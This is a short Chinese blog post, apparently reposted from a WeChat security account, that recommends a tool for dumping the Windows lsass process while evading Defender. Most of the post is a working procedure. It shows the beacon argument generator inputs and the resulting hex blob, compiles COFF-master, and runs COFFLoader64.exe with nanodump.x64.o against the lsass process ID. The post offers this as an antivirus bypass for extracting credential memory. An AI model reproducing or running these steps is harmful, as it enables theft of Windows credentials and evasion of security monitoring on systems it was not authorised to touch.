这里推荐一个老外的Dump lsass进程的一个项目。
一般Dump lsass进程的方式都会被Defender拦截掉。
直接转储:
使用rundll32.exe
processdump:
使用老外的项目:
python3 beacon_generate.py
python3 beacon_generate.py
Beacon Argument Generator
addint lsass进程ID
addString output.dmp
addint 1
addint 1
addint 0
addint 1
addint 0
addint 0
addint 0
addint 0
addint 0
addint 0
addString ""
addint 0
addint 0
addint 0
addString ""
addint 0
generate
b'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'
编译文件
cd COFF-master
make
落地执行:
COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
defender:
项目地址回复20231202获取。
原文始发于微信公众号(Relay学安全):绕过Defender Dump Lsass进程(项目推荐)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论